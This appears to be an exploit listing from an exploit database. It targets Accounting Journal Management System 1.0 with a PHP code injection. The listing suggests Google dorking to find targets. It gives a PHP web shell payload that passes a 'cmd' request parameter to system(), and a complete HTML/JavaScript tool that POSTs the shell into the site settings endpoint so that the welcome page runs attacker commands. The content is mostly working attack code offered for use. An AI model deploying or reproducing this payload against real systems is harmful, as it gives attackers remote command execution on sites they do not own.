Share
## https://sploitus.com/exploit?id=PACKETSTORM:180251
=============================================================================================================================================
| # Title : Accounting Journal Management System 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/ajms_0_0.zip |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] This payload injects code of your choice into an HTML page.
You give it a name and save it in the root directory of the script. and executes it remotely.
[+] Line 11 : 'Content[welcome]' = Replace "welcome" with any label you want.
[+] Line 11 : Replace the payload as you wish = <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
[+] save payload as poc.html
[+] Set your target url
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title> PHP code injection Tool</title>
<script>
async function sendRequest() {
const url = document.getElementById('url').value;
const postData = {
'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`
};
try {
const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: new URLSearchParams(postData).toString()
});
if (response.ok) {
document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';
} else {
document.getElementById('result').innerText = 'Error: ' + response.statusText;
}
} catch (error) {
document.getElementById('result').innerText = 'Error making request: ' + error.message;
}
}
</script>
</head>
<body>
<h1>Injection Tool</h1>
<form onsubmit="event.preventDefault(); sendRequest();">
<label for="url">Enter URL:</label>
<input type="text" id="url" name="url" required>
<button type="submit">Submit</button>
</form>
<pre id="result"></pre>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================